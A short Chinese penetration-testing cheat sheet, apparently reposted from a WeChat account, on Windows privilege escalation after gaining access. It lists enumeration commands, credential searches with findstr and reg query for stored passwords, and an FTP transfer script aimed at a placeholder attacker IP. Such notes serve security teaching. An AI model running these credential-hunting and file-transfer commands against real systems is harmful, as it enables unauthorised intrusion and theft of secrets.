在“肾透”测试中。我们最终的目的是提权,尽可能的或者系统最高的权限。收集目标主机的各类信息,从而尽可能全面的完成“肾透”。
当我们得到目标权限,如何尽可能全面的获取目标信息或者提权呢?本文让我们一起来学习吧!
信息收集
查找已安装的软件,正在运行的进程,查找已安装的修补程序,体系结构,操作系统版本等等。
获取系统信息
systeminfo
获取主机名
hostname
显示当前用户名
echo %username%
列出所有用户
net users
列出用户的相关信息
net users Administrator
当前网络信息
pconfig /all & route print & arp -a
当前网络连接
netstat -aton
利用此命令,我们可以排查系统中的异常连接。
检查启动的Windows服务器
net start
查找敏感信息
在系统中,目标可能会存放很多敏感的信息,如各类账号和密码。我们可以利用下面命令查找目标中存放的账号和密码信息。
findstr /si password *.txt
在文件中查找关键词内容。
findstr /spin "password" *.*
在注册表中搜索密码
reg query HKLM /f password /t REG_SZ /s
传输文件
我们可以利用NC
等工具传送文件,也可以系统自带的工具进行文件传输。
echo open 攻击者ip 21> ftp.txt
当然,也可以与RDP共享文件夹
rdesktop (ip) -r disk:share=/home/kali
漏洞扫描
对于漏洞扫描,可以利用nessus awvs等工具进行漏送扫描。在前面的文章中已经讲到过,可以自行搜索。
原文始发于微信公众号(kali笔记):Windows提权备忘录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论